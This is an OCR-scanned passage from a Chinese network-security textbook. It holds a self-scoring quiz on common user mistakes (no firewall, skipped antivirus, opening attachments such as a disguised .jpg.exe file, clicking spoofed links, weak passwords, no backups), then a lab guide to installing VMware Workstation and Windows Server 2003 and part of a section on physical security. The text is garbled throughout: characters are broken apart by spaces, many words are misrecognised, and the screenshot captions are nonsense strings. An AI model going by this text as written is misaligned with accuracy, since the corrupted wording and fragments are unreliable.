使 用 电 涌 保护 器 就 能 够 保护 系统 免 受 电 涌 的 危害 ,但 是 请 记 住 .大 部 分 价钱 便宜 的 电 涌 
保护 器 只 能 抵御 一 次 电 涌 , 随 后 需要 进行 更 换 。 不 间断 电源 (UPS) 更 胜 于 电 涌 保 护 器 ， 
UPS 的 电池 能 使 电流 趋 于 平稳 ,即使 断 电 .也 能 给 你 提供 时 间 , 从 容 地 关闭 设备 。 


请 选择 : 
A. 我 懂得 并 已 经 做 到 了 B. 我 懂得 一 点 ,但 觉得 没 必要 
C. 知道 电 涌 的 厉害 ,但 不 知道 UPS D. 现在 刚 知道 我 会 关注 这 一 点 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 
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@ 不 使 用 防火 墙 就 上 网 。 许 多 家 庭 用 户 会 毫 不 犹 玉 地 启动 计算 机 开始 上 网 ,而 没有 意 
识 到 他 们 正 将 自己 暴露 在 病毒 和 入 侵 者 面前 。 无 论 是 宽带 调制 解 调 器 或 者 路 由 器 中 内 置 的 
防火 墙 ,还 是 调制 解 调 器 或 路 由 器 与 计算 机 之 间 的 独立 防火 墙 设备 ,或 者 是 在 网 络 边缘 运行 
防火 墙 软件 的 服务 器 .或 者 是 计算 机 上 安装 的 个 人 防火 墙 软件 (如 Windows XP 中 内 置 的 防 
火 墙 ,或 者 类 似 Kerio 等 第 三 方 防 火 墙 软件 ) :总 之 ,所 有 与 互联 网 相连 的 计算 机 都 应 该 得 到 
防火 墙 的 保护 。 

在 笔记 本 电脑 上 安装 个 人 防火 墙 的 好 处 在 于 , 当 用 户 带 着 笔记 本 电脑 上 路 或 者 插入 酒 
店 的 上 网 端口 ,或 者 与 无 线 热点 相连 接 时 ,已 经 有 了 防火 墙 。 拥有 防火 墙 不 是 全 部 ,你 还 需 
要 确认 防火 墙 是 否 已 经 开启 ,并 且 配 置 得 当 , 能 够 发 挥 保护 作用 。 


请 选择 : 
A. 我 懂得 并 已 经 做 到 了 B. 我 懂得 一 点 ,但 觉得 没 必要 
C. 知道 有 防火 墙 但 没有 用 过 D. 现在 刚 知 道 , 我 会 关注 这 一 点 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 


回 忽视 防 病毒 软件 和 防 间谍 软件 的 运行 与 升级 。 事 实 上 , 防 病毒 程序 令 人 讨厌 , 它 总 
是 阻 断 一 些 你 想 要 使 用 的 应 用 ,而 且 为 了 保证 效用 还 需要 经 常 升级 ,在 很 多 情况 下 升级 都 是 
收费 的 。 但 是 ,尽管 如 此 ,在 现在 的 应 用 环境 下 ,你 无 法 承担 不 使 用 防 病 毒 软件 所 带 来 的 后 
果 。 病毒 ,木马 .蠕虫 等 恶意 程序 不 仅 会 削弱 和 破坏 系统 ,还 能 通过 你 的 计算 机 向 网 络 其 他 
部 分 散播 病毒 。 在 极端 情况 下 ,甚至 能 够 破坏 整个 网 络 。 

间谍 软件 是 另外 一 种 不 断 增 加 的 威胁 。 这 些 软件 能 够 自行 在 计算 机 上 进行 安装 ( 通 
常 都 是 在 你 不 知道 的 情况 下 ) ,搜集 系统 中 的 情报 .然后 发 送 给 间谍 软件 程序 的 作者 或 销 
售 商 。 防 病毒 程序 经 常 无 法 察觉 间谍 软件 ,因此 需要 使 用 专业 的 间谍 软件 探测 清除 
软件 。 


请 选择 : 
A. 我 懂得 并 已 经 做 到 了 B. 我 懂得 一 点 .但 觉得 没 必要 
C. 知道 防 病 毒 .但 不 知道 防 间 谍 D. 现在 刚 知道 ,我 会 关注 这 一 点 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 


@ 安装 和 印 载 大 量程 序 ,特别 是 测试 版 程序 。 由 于 用 户 对 新 技术 的 热情 和 好 奇 , 经 党 
安装 和 尝试 新 软件 。 免 费 提供 的 测试 版 程序 甚至 盗版 软件 能 够 使 你 有 机 会 抢先 体验 新 的 功 
能 。 另 外 还 有 许多 可 以 从 网 上 下 载 的 免费 软件 和 共享 软件 。 

但 是 ,安装 软件 的 数量 越 多 ,使 用 含有 恶意 代码 的 软件 ,或 者 使 用 编写 不 合理 的 软件 而 
可 能 导致 系统 工作 不 正常 的 概率 就 高 。 这 样 的 风险 远 高 于 使 用 盗版 软件 。 另 一 方面 ,过 多 
的 安装 和 秃 载 也 会 弄 乱 Windows 的 系统 注册 表 , 因 为 并 不 是 所 有 的 印 载 步骤 都 能 将 程序 剩 
余部 分 清理 干净 .这样 的 行为 会 导致 系统 逐渐 变 慢 。 

你 应 该 只 安装 自己 真正 需要 使 用 的 软件 ,只 使 用 合法 软件 .并 且 尽 量 减少 安装 和 印 载 软 
件 的 数量 。 

请 选择 : 

A. 我 懂得 并 已 经 做 到 了 B. 我 懂得 一 点 ,但 觉得 没 必要 
C. 有 点 了 解 但 不 知道 什么 是 注册 表 口 D. 现在 刚 知道 ,我 会 关注 这 一 点 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 
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回 磁盘 总 是 满 满 的 并 且 非 常 凌乱 。 频 繁 安 装 和 和 缉 载 程序 (或 增加 和 删除 任何 类 型 的 
数据 ) 都 会 使 磁盘 变 得 零散 。 信 息 在 磁盘 上 的 保存 方式 导致 了 磁盘 碎片 的 产生 ,这 样 就 使 
得 磁盘 文件 变 得 零散 或 者 分 裂 。 然 后 在 访问 文件 时 ,磁头 不 会 同时 找到 文件 的 所 有 部 分 ,而 
是 到 磁盘 的 不 同 地 址 上 找 回 全 部 文件 ,这 样 使 得 访问 速度 变 慢 。 如 果 文 件 是 程序 的 一 部 分 ， 
程序 的 运行 速度 就 会 变 慢 。 

可 以 使 用 Windows 自 带 的 “磁盘 碎片 整理 ”工具 (在 Windows 的 “开始 ”一 “所 有 程 
序 ”=>“ 附 件 ” 菜 单 中 单 击 “ 系 统 工具 ”命令 ) 来 重新 安排 文件 的 各 个 部 分 ,以 使 文件 在 磁盘 上 
能 够 连续 存放 。 

另外 一 个 常见 的 能 够 导致 性 能 问题 和 应 用 行为 不 当 的 原因 是 磁盘 过 满 。 许 多 程序 都 会 
生成 临时 文件 ,运行 时 需要 磁盘 提供 额外 空间 。 


请 选择 : 
A. 我 懂得 并 已 经 做 到 了 B. 我 懂得 一 点 ,但 觉得 不 重要 
C. 有 点 知道 但 不 懂 “ 磁 盘 碎 片 整 理 ” D. 现在 刚 知道 ,我 会 关注 这 一 点 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 


@ 打开 所 有 的 附件 。 收 到 带 有 附件 的 电子 邮件 就 好 像 收 到 一 份 意外 的 礼物 ,总 是 想 窥 
视 一 下 是 什么 内 容 。 但 是 ,电子 邮件 的 附件 可 能 包含 能 够 删除 文件 或 系统 文件 夹 ,或 者 向 地 
址 竹中 所 有 联系 人 发 送 病毒 的 编码 。 

最 容易 被 洞察 的 危险 附件 是 可 执行 文件 〈 即 扩展 名 为 . exe、. com 的 文件 ) 以 及 其 他 很 
多 类 型 。 不 能 自行 运行 的 文件 .如 Word 的 . doc 和 Excel 的. xls 文件 等 .其 中 能 够 含有 内 置 
的 宏 。 肢 本 文件 (Visual Basic、JavaScript、Flash 等 ) 不 能 被 计算 机 直接 执行 ,但 是 可 以 通 
过 程序 进行 运行 。 

过 去 一 般 认为 纯 文本 文件 (. txt) 或 图 片 文件 (. gif、. jpg、 bmp) 是 安全 的 ,但 现在 也 
不 是 了 。 文 件 扩展 名 也 可 以 伪装 ,入 侵 者 能 够 利用 Windows 默认 的 不 显示 普通 的 文件 扩展 
名 的 特性 设置 ,将 可 执行 文件 名 称 设 为 类 似 greatfile. jpg. exe 这 样 。 实 际 的 扩展 名 被 隐藏 
起 来 ,只 显示 为 greatfile. jpg。 这 样 收 件 人 会 以 为 它 是 图 片 文件 ,但 实际 上 却 是 恶意 程序 。 

你 只 能 在 确信 附件 来 源 可 靠 并 且 知道 是 什么 内 容 的 情况 下 才 可 以 打开 附件 。 即 使 带 有 
附件 的 邮件 看 起 来 似乎 来 自 你 可 以 信任 的 人 ,也 有 可 能 是 某 些 人 将 他 们 的 地 址 伪装 成 这 样 ， 
甚至 是 发 件 人 的 计算 机 已 经 感染 了 病毒 ,在 他 们 不 知情 的 情况 下 发 送 了 附件 。 

请 选择 : 


A. 我 懂得 并 已 经 做 到 了 B. 我 懂得 一 点 ,但 觉得 并 不 严重 
C. 知道 附件 危险 但 不 太 了 解 扩展 名 D. 现在 刚 知道 ,我 会 关注 这 一 点 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 


@ 单 击 所 有 链接 。 打 开 附 件 不 是 鼠标 所 能 带 给 你 的 唯一 麻烦 。 单 击 电子 邮件 或 者 网 
页 上 的 超 链 接 能 将 你 带 入 植 人 ActiveX 控制 或 者 脚本 的 网 页 ,利用 这 些 就 可 能 进行 各 种 类 
型 的 恶意 行为 ,如 清除 硬盘 .或 者 在 计算 机 上 安装 后 门 软件 ,这 样 黑客 就 可 以 潜入 并 夺取 控 
制 权 。 
点 错 链接 也 可 能 会 带 你 进入 具有 色情 图 片 .盗版 音乐 或 软件 等 不 良 内 容 的 网 站 。 如 果 
你 使 用 的 是 工作 计算 机 ,就 可 能 会 因此 麻烦 缠身 .甚至 惹 上 官司 。 
在 单 击 链接 之 前 请 务必 考虑 一 下 。 有 些 链接 可 能 被 伪装 在 网 络 钓鱼 信息 或 者 那些 可 
过 
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能 将 你 带 到 别 的 网 站 的 网 页 里 。 例 如 ,链接 地 址 可 能 是 www. a. com, 但 实际 上 会 指向 
www. b. com。 一 般 情 况 下 ,用 鼠标 在 链接 上 滑 过 而 不 要 单 击 ,就 可 以 看 到 实际 的 URL 地 址 。 


请 选择 : 
A. 我 懂得 并 已 经 做 到 了 B. 我 懂得 一 点 ,但 觉得 并 不 严重 
C. 以 前 遇 到 过 但 没有 深入 考虑 D. 现在 刚 知道 ,我 会 关注 这 一 点 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 


@ 共享 或 类 似 共享 的 行为 。 分 享 是 一 种 良好 的 行为 ,但 是 在 网 络 上 ,分 享 则 可 能 将 你 
暴露 在 危险 之 中 。 如 果 你 允许 文件 和 打印 机 共享 ,别人 就 可 以 远程 与 你 的 计算 机 连接 ,并 访 
问 你 的 数据 。 即 使 没有 设置 共享 文件 夹 , 在 默认 情况 下 ,Windows 系统 会 隐藏 每 块 磁盘 根 
日 录 上 可 管理 的 共享 。 一 个 黑客 高 手 有 可 能 利用 这 些 共享 侵入 你 的 计算 机 。 解 决 方法 之 一 
就 是 ,如 果 你 不 需要 网 络 访问 你 计算 机 上 的 任何 文件 ,就 请 关闭 文件 和 打印 机 共享 。 如 果 确 
实 需要 共享 某 些 文件 夹 , 请 务必 通过 共享 级 许可 和 文件 级 (NTFS) 许可 对 文件 夹 进行 保 
护 。 另 外 ,还 要 确保 你 的 账号 和 本 地 管理 账号 的 密码 足够 安全 。 

请 选择 : 

A. 我 羽 得 并 已 经 做 到 了 

B. 我 懂得 一 点 ,但 觉得 并 不 严重 

C. 知道 共享 文件 和 文件 夹 有 危险 ,但 不 知道 共享 打印 机 也 危险 
D. 现在 刚 知道 ,我 会 关注 这 一 点 

E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 

@ 用 错 密码 。 这 也 是 使 得 我 们 暴露 在 入侵 者 面前 的 又 一 个 常见 错误 。 即 使 网 络 管理 
员 并 没有 强迫 你 选择 强大 的 密码 并 定期 更 换 . 你 也 应 该 自觉 这 样 做 。 不 要 选用 容易 被 猿 中 
的 密码 ,上 且 密码 越 长 越 不 容易 被 破解 。 因 此 ,建议 你 的 密码 至 少 为 8 位 。 常 用 的 密码 破解 方 
法 是 采用 “字典 ”破解 法 ,因此 ,不 要 使 用 字典 中 能 查 到 的 单词 作为 密码 。 为 安全 起 见 , 密 码 
应 该 由 字母 .数字 以 及 符号 组 合 而 成 。 很 长 的 无 意义 的 字符 串 密码 很 难 被 破解 ,但 是 如 果 你 
因为 记 不 住 密码 而 不 得 不 将 密码 写 下 来 ,就 违背 了 设置 密码 的 初衷 ,因为 人 侵 者 可 能 会 找到 
密码 。 例 如 ,可 以 造 一 个 容易 记 住 的 短语 ,并 使 用 每 个 单词 的 第 一 个 字母 ,以 及 数字 和 符号 
生成 一 个 密码 。 

请 选择 : 

A. 我 懂得 并 已 经 做 到 了 

B. 我 懂得 一 点 ,但 觉得 并 不 严重 

C. 知道 密码 但 不 了 解密 码 

D. 现在 刚 知道 .我 会 关注 这 一 点 

E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 

四 忽视 对 备份 和 恢复 计划 的 需要 。 即 使 你 听取 了 所 有 的 建议 ,入 侵 者 依然 可 能 弄 震 你 
的 系统 ,你 的 数据 可 能 遭 到 算 改 .或 因 硬件 问题 而 被 擦 除 。 因 此 .备份 重要 信息 .制定 系统 故 
障 时 的 恢复 计划 是 相当 必要 的 。 

大 部 分 计算 机 用 户 都 知道 应 该 备份 ,但 是 许多 用 户 从 来 都 不 进行 备份 ,或 者 最 初 做 过 备 
份 但 是 从 来 都 不 定期 对 备份 进行 升级 。 应 该 使 用 内 置 的 Windows 备份 程序 或 者 第 三 方 备 
份 程序 以 及 可 以 自动 进行 备份 的 定期 备份 程序 。 所 备份 的 数据 应 当 保存 在 网 络 服务 器 或 者 
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远离 计算 机 的 移动 存储 器 中 ,以 防止 洪水 .火灾 等 灾难 情况 的 发 生 。 

请 牢记 数据 是 你 计算 机 上 最 重要 的 东西 。 操 作 系统 和 应 用 程序 都 可 以 重新 安装 ,但 重 
建 原 始 数据 则 是 难度 很 高 甚至 根本 无 法 完成 的 任务 。 

请 选择 : 
A. 我 仅 得 并 已 经 做 到 了 
DB. 我 懂得 一 点 ,但 灾难 毕竟 很 少 
C. 知道 备份 重要 但 不 会 应 用 
D. 现在 刚 知道 ,我 会 关注 这 一 点 
L] E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 

请 汇总 并 分 析 : 上 述 10 个 安全 问题 ,如 果 A 选项 为 10 分 ,B 选项 为 8 分 ,C 选项 为 
6 分 ,D 选项 为 4 分 ,E 选项 为 2 分 ,请 汇总 ,你 的 得 分 是 分 。 

用 户 总 是 会 用 层出不穷 的 方法 给 自己 车 上 麻烦 。 与 你 的 同学 和 朋友 们 分 享 这 个 * 傻 事 
清单 ”, 将 能 够 避免 他 们 犯 这 些 原 本 可 以 避免 发 生 的 错误 。 你 觉得 呢 ? 请 简 述 你 的 看 法 。 


1.4.2 任务 2:VMware 虚拟 机 的 安装 与 使 用 


1. 任务 目标 


(1) 了 解 虚拟 机 技术 在 网 络 安全 实 训 项 目 中 的 应 用 。 
(2) 掌握 VMware Workstation 虚拟 机 软件 的 使 用 方法 。 


2. 任务 内 容 


(1) 安装 VMware Workstation 软件 。 
(2) 安装 Windows Server 2003 操作 系统 。 
(3) VMware 虚拟 机 功能 设置 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP 操作 系统 的 PC 1 台 。 
(2) VMware Workstation 7. 1 软件 。 
(3) Windows Server 2003 安装 光盘 或 ISO 镜像 文件 。 


4. 任务 实施 步骤 


(1) 安装 VMware Workstation 软件 

访问 VMware 公司 的 官方 网 站 (http://www. vmware. com/cn/), 下 载 最 新 版 本 的 
VMware Workstation 软件 。 下 面 使 用 VMware Workstation 7. 1 安装 虚拟 机 .并 在 其 上 安 
装 Windows Server 2003 操作 系统 软件 。 

步骤 1: 双击 下 载 的 安装 程序 包 , 进 入 程序 的 安装 过 程 。 安 装 包装 载 完 成 之 后 ,进入 安 
装 向 导 , 如 图 1-4 所 示 。 单 击 Next 按钮 ,进入 安装 类 型 选择 对 话 框 ,如 图 1-5 所 示 。 
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图 1-4 安装 向 导 (1) 图 1-5 选择 安装 类 型 (1) 


步骤 2: 单 击 Typical 按钮 ,进入 安装 路 径 设置 对 话 框 , 如 图 1-6 所 示 。 如 果 要 更 改 安装 
路 径 ,可 单 击 Change 按钮 进行 更 改 ,如 选择 D:\VM 7. 1 安装 路 径 。 

步骤 3: 单 击 Next 按钮 ,进入 软件 更 新 设置 对 话 框 , 如 图 1-7 所 示 。 选 中 Check for 
product updates on startup 复 选 框 , 这 样 可 在 程序 启动 的 时 候 检查 软件 的 更 新 。 

步骤 4: 单 击 Next 按钮 ,进入 用 户 信息 反馈 设置 对 话 框 ,如 图 1-8 所 示 。 取 消 选中 
Help improve VMware Workstation 复 选 框 , 这 样 不 会 发 送 匿名 的 系统 数据 和 使 用 统计 信 
息 给 VMware 公司 。 

步骤 5: 单 击 Next 按钮 ,进入 快捷 方式 设置 对 话 框 ,如 图 1-9 所 示 。 根 据 需 要 选中 相应 
快捷 方式 的 复 选 框 。 

步骤 6: 单 击 Next 按钮 ,进入 准备 正式 安装 对 话 框 ,如 图 1-10 所 示 。 单 击 Continue 按 
钮 ,开始 正式 安装 。 


Destination Folder . Software Updates, 
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但 move 
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图 1-6 安装 向 导 (2) 图 1-7 选择 安装 类 型 (2) 


步骤 7: 安装 完成 后 , 单 击 Next 按钮 ,出 现 要 求 输 入 License Key 的 对 话 框 ,如 图 1-11 所 示 。 
输入 License Key 后 , 单 击 Enter 按钮 。 

步骤 8: 如 果 输 入 的 License Key 正确 , 则 出 现 安装 向 导 完成 对 话 框 ,如 图 1-12 所 示 。 
单 击 Restart Now 按钮 立即 重新 启动 计算 机 ;也 可 以 单 击 Restart Later 按钮 稍 后 重新 启动 
计算 机 。 


20 


项 目 1 认识 计算 机 网 络 安全 技术 | 


rd rth tet ese i 


站 tep merove wwere wortstaton, 
CT 


Ready to Perform the Requested Operations Enter Uicense 
gov ts veomabon eter 


Che orbne to begn the process, 
Uceree Ye: Coocoooootoooopooootoooo 


Ten of your otalation settings, heh pad KA: conealto 
Hn age ory of yo ng， 


图 1-10 准备 正式 安装 图 1-11 输入 License Key 
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图 1-12 安装 向 导 完 成 图 1-13 认证 许可 协议 


步骤 9: 重新 启动 计算 机 后 ,选择 “开始 "一 “程序 "一 VMware 一 VMware Workstation 
命令 .出 现 认证 许可 协议 对 话 框 .如 图 1-13 所 示 。 

步骤 10: 选中 Yes,I accept the terms in the license agreement 单 选 按钮 后 , 单 击 OK 
按钮 ,进入 VMware Workstation 程序 主 界面 。 

由 于 VMware Workstation 程序 主 界面 是 英文 的 .不 方便 用 户 使 用 .用 户 可 安装 相应 的 
汉化 包 软 件 , 安 装 汉 化 包 软 件 后 的 程序 主 界 面 如 图 1-14 所 示 。 
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图 1-14 汉化 后 的 程序 主 界面 


(2) 安装 Windows Server 2003 操作 系统 

安装 完 虚拟 机 后 ,就 如 同 组 装 了 一 台新 的 计算 机 ,因而 需要 安装 操作 系统 。 

步骤 1: 单 击 图 1-14 中 的 “新 建 虚拟 机 ”按钮 ,或 选择 “文件 ”一 “新 建 ”>“ 虚 拟 机 ”命令 ， 
出 现 新 建 虚拟 机 向 导 对 话 框 ,如 图 1-15 所 示 。 

步骤 2: 选中 “标准 (推荐 )" 单 选 按钮 后 , 单 击 “ 下 一 步 " 按 钮 ,出 现 操作 系统 安装 来 源 选 
择 对 话 框 ,如 图 1-16 所 示 。 选 中 “安装 盘 镜 像 文件 (iso)" 单 选 按钮 后 , 单 击 “ 浏 览 ” 按 钮 ,选择 
Windows Server 2003 安装 镜像 文件 (如 D:\Windows 2003. ISO) 。 

步骤 3: 单 击 “下 一 步 ” 按 钮 ,出 现 系统 安装 信息 对 话 框 ,如 图 1-17 所 示 。 输 入 安装 系统 
的 Windows 产品 密 钥 , 以 及 安装 序列 号 ,同时 可 设置 系统 的 账户 名 称 及 密码 。 


新 建 虚拟 机 向 导 新 建 虚拟 机 向 号 
安装 客户 机 损 作 系统 


物理 计算 机 ， 它 需要 一 个 换 作 系统 。 你 格 如 何 安装 客户 
| i 欢迎 使 用 新 建 虚拟 机 向 导 Li 
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Workstation 71 
创建 一 个 虚 执 空白 硬盘 。 


口 习 以 后 再 安装 换 作 系统 GE)。 


< 上 一 四] FSm> 


图 1-16 操作 系统 安装 来 源 选择 


图 1-15 新 建 虚拟 机 向 导 


步骤 4: 单 击 “ 下 一 步 ” 按 钮 ,出 现 设置 虚拟 机 名 称 和 位 置 对 话 框 ,如 图 1-18 所 示 。 在 
“虚拟 机 名 称 ” 文 本 框 中 输入 虚拟 机 名 称 ( 如 Windows Server 2003 Enterprise Edition) ,在 
“位 置 "文本 框 中 输入 操作 系统 存放 路 径 ( 如 D:\Windows Server 2003)。 
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图 1-17 系统 安装 信息 图 1-18 设置 虚拟 机 名 称 和 位 置 


步骤 5: 单 击 “下 一 步 ” 按 钮 ,出 现 指定 磁盘 容量 对 话 框 ,如 图 1-19 所 示 。 设 置 最 大 磁盘 
空间 为 40GB。 

步骤 6: 单 击 * 下 一 步 "按钮 ,出现 准备 创建 虚拟 机 对 话 框 , 如 图 1-20 所 示 。 

步骤 7: 单 击 “ 定 制 硬件 ”按钮 ,打开 “硬件 ”对 话 框 , 单 击 “ 网 络 适配器 NAT” 选 项 后 ,在 
“网 络 连接 ”区域 中 选中 “桥接 :直接 连接 到 物理 网 络 " 单 选 按 钮 ,如 图 1-21 所 示 。 

步骤 8: 单 击 “ 确 定 ” 按 钮 ,返回 准备 创建 虚拟 机 对 话 框 , 单 击 “ 完 成 "按钮 。 

此 后 ,VMware 虚拟 机 会 根据 安装 镜像 文件 开始 安装 Windows Server 2003 操作 系统 ， 
按照 安装 向 导 提 示 完 成 Windows Server 2003 操作 系统 的 安装 。 
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图 1-19 指定 磁盘 容量 图 1-20 准备 创建 虚拟 机 


说 明 :VMware Workstation 的 网 络 连 接 设置 共有 4 种 不 同 的 方式 。 

@ 桥接 (Bridged) 方 式 :这 种 方式 是 将 虚拟 系统 接 入 网 络 最 简单 的 方法 。 虚 拟 系 统 的 
IP 地 址 可 设置 成 与 宿主 机 系统 在 同一 网 段 ,虚拟 系统 相当 于 网 络 内 的 一 台独 立 的 机 器 ,与 
宿主 机 系统 就 像 连 接 在 同一 个 集线器 (HUB) 上 .网 络 内 的 其 他 机 器 可 访问 虚拟 系统 ,虚拟 
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图 1-21 “硬件 ”对 话 框 


系统 也 可 访问 网 络 内 的 其 他 机 器 ,当然 与 宿主 机 系统 的 双向 访问 也 不 成 问题 。 

@ NAT( 网 络 地 址 转换 ) 方 式 : 这 种 方式 也 可 以 实现 宿主 机 系统 与 虚拟 系统 的 双向 访 
间 , 但 网 络 内 其 他 机 器 不 能 访问 虚拟 系统 ,虚拟 系统 可 通过 宿主 机 系统 用 NAT 协议 访问 网 
络 内 其 他 机 器 。 

@ Host-only 方式 :顾名思义 这 种 方式 只 能 进行 虚拟 系统 和 宿主 机 系统 之 间 的 网 络 通 
信 , 即 网 络 内 其 他 机 器 不 能 访问 虚拟 系统 ,虚拟 系统 也 不 能 访问 其 他 机 器 。 

图 自 定义 (Custom) 方 式 : 使 用 这 种 连接 方式 ,虚拟 系统 存在 于 一 个 虚拟 的 网 络 当 中 ， 
不 能 与 外 界 通信 ,只 能 与 在 同一 虚拟 网 络 中 的 虚拟 系统 通信 。 

(3) VMware 虚拟 机 功能 设置 

QO@ 网 络 设置 。 由 于 本 项 上 日 联网 采用 的 是 桥接 (Bridged) 方 式 ,此 时 虚拟 主机 和 宿主 机 
的 真实 网 卡 可 以 设置 在 同一 个 网 段 ,两 者 之 间 的 关系 就 像 是 相 邻 的 两 台 计 算 机 一 样 。 

步骤 1: 设置 宿主 机 的 IP 地 址 为 192. 168. 1. 11 , 子 网 掩 码 为 255. 255. 255. 0。 设 置 虚 
拟 主 机 的 IP 地 址 为 192. 168. 1. 111 , 子 网 掩 码 为 255. 255. 255. 0。 

步骤 2: 在 宿主 机 中 ,运行 ping 192. 168. 1. 111 命令 ,测试 与 虚拟 主机 的 连通 
性 ,如 图 1-22 所 示 。 

@ 系统 快照 设置 。 快 照 (Snapshot) 指 的 是 虚拟 磁盘 (VMDK) 在 某 一 特定 时 间 点 的 副 
本 。 通 过 快照 可 以 在 系统 发 生 问 题 后 恢复 到 快照 的 时 间 点 ,从 而 有 效 保护 磁盘 上 的 文件 系 
统 和 虚拟 机 的 内 存 数据 。 

在 VMware 中 进行 实验 ,可 以 随时 把 系统 恢复 到 某 一 次 快照 的 过 去 状态 中 ,这 个 过 程 
对 于 在 虚拟 机 中 完成 一 些 对 系统 有 潜在 危害 的 实验 非常 有 用 。 

步骤 1: 创建 快照 。 在 虚拟 机 中 ,选择 “虚拟 机 ”一 “ 人 快照 "一 “从 当前 状态 创建 快照 ” 命 
令 , 打 开 “ 创 建 快照 ?对话 框 ,如 图 1-23 所 示 。 在 “名 称 ” 文 本 框 中 输入 快照 名 (如 “快照 1”)， 
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图 1-22 通过 ping 命令 测试 与 虚拟 主机 的 连通 性 


单 击 “ 确 定 ” 按 钮 .VMware Workstation 会 对 当前 系统 状态 进行 保存 。 

步骤 2: 利用 快照 进行 系统 还 原 。 选 择 “ 虚 拟 机 ”一 “快照 ?一 “1 快照 1” 命 令 , 如 
图 1-24 所 示 ,出现 提示 信息 后 , 单 击 “ 是 ”按钮 ,VMware Workstation 就 会 将 在 该 点 保存 的 
系统 状态 进行 还 原 。 

@ 修改 虚拟 机 的 基本 配置 。 创 建 好 的 虚拟 机 的 基本 配置 ,如 虚拟 机 的 内 存 大 小 、 硬 盘 
数量 、 网 卡 数量 和 连接 方式 、 声 卡 、USB 接口 等 设备 并 不 是 一 成 不 变 的 ,可 以 根据 需要 进行 
修改 。 

步骤 1: 在 VMware Workstation 主 界面 中 ,选中 想 要 修改 配置 的 虚拟 机 名 称 ( 如 
Windows Server 2003 Enterprise Edition) ,再 选择 “虚拟 机 ”一 “设置 "命令 ,打开 “虚拟 机 设 
置 ?对 话 框 , 如 图 1-25 所 示 。 

步骤 2: 在 “虚拟 机 设置 "对 话 框 中 ,根据 需要 可 调整 虚拟 机 的 内 存 大 小 、 添 加 或 者 删除 
硬件 设备 .修改 网 络 连接 方式 ,修改 虚拟 机 中 CPU 的 数量 ,设置 虚拟 机 的 名 称 、 修 改 虚 拟 机 
的 操作 系统 及 版 本 等 选项 。 

@ 设置 共享 文件 夹 。 有 时 可 能 需要 虚拟 机 操作 系统 和 宿主 机 操作 系统 共享 一 些 文件 ， 
可 是 虚拟 硬盘 对 宿主 机 来 说 只 是 一 个 无 法 识别 的 文件 ,不 能 直接 交换 数据 ,此 时 可 使 用 “ 共 
享 文件 夹 ” 功 能 来 解决 ,设置 方法 如 下 。 
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图 1-23 “创建 快照 ”对话 框 图 1-24 利用 快照 进行 系统 还 原 
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图 1-25 “虚拟 机 设置 "对 话 框 (1) 


步骤 1: 选择 “虚拟 机 ”一 “设置 "命令 ,打开 “虚拟 机 设置 ”对话 框 ,选择 “选项 ”选项 卡 ， 
如 图 1-26 所 示 。 

步骤 2: 选择 左 侧 窗 格 中 “共享 文件 夹 ”选项 ,在 “文件 夹 共 享 " 区 域 中 ,选中 “总 是 启用 ” 
单 选 按 钮 和 “在 客户 机 映射 为 一 个 网 络 驱 动 器 " 复 选 框 后 , 单 击 “ 添 加 ”按钮 ,启动 向 导 。 单 击 
“下 一 步 "按钮 ,出 现 “ 共 享 文件 夹 名 称 ” 对 话 框 ,在 “主机 路 径 ” 文 本 框 中 ,指定 宿主 机 上 的 一 
个 文件 夹 作 为 交换 数据 的 地 方 .如 “D:\VMware Shared”; 在 “名 称 ” 文 本 框 中 ,输入 共享 名 
称 , 如 VMware Shared, 如 图 1-27 所 示 。 

步骤 3: 单 击 “ 下 一 步 ” 按 钮 ,选中 “启用 该 共享 " 复 选 框 后 , 单 击 “ 完 成 ”按钮 。 此 时 ,共享 
文件 夹 在 虚拟 机 中 映射 为 一 个 网 络 驱动 器 (Z: 盘 ) 。 


添加 共享 文件 去 向导 


共 李 文件 到 名 冤 
食 想 要 让 共享 廊 件 夫 使 用 什么 名称 ? 
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图 1-26 “虚拟 机 设置 "对话 框 (2) 图 1-27 设置 共享 文件 夹 
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15 拓展 提高 : 基本 物理 安全 


物理 安全 很 容易 被 忽略 ,尤其 是 在 小 企业 或 家 庭 中 工作 时 。 但 一 旦 黑客 进入 你 的 机 器 ， 
那么 几 分 钟 内 就 会 受到 安全 威胁 。 请 掌握 以 下 这 些 原则 :让 你 的 机 器 远离 人 群 .将 他 人 阻止 
在 外 和 保护 你 的 设备 。 

(1) 让 你 的 机 器 远离 人 群 

很 多 大 公司 都 严格 控制 有 权 进 入 其 数据 中 心 的 人 员 ,他 们 使 用 钥匙 卡 或 键盘 系统 日志 
德 或 人 员 安 全 系统 (门禁 系统 ) 来 限制 未 经 授权 的 访问 。 由 于 一 般 没 有 数据 中 心 ,一 些小 型 
企业 通常 喜欢 把 服务 器 放 在 走廊 、 接 待 场所 或 其 他 公开 的 地 方 。 这 不 仅 使 服务 器 容易 遭受 
恶意 攻击 ,而 且 还 增加 了 发 生意 外 事故 的 风险 ,比如 咖啡 泼 到 机 器 上 ,有 人 绊 到 电缆 等 。 

如 果 可 能 ,应 该 将 敏感 的 服务 器 放 在 上 锁 的 门 后 。 其 实 , 不 仅 应 该 将 门 锁 住 ,而 且 还 应 
该 将 访问 权限 局 限 在 一 些 经 过 挑选 并 值得 信赖 的 管理 员 身 上 。 当 然 ,也 不 应 该 只 考虑 安全 
问题 ,而 不 顾 硬件 环境 的 要 求 。 例 如 ,将 一 台 服 务 器 锁 在 密室 里 自然 安全 ,但 如 果 房 间 的 通 
风能 力 不 足 ,计算 机 会 因 过 热 而 出 现 故 障 , 从 而 使 得 你 对 安全 问题 的 考虑 变 得 毫 无 意义 。 

毫 无 疑问 ,计算 机 不 是 你 拥有 的 唯一 有 价值 的 资产 .还 应 该 考虑 备份 磁盘 的 价值 。 如 果 
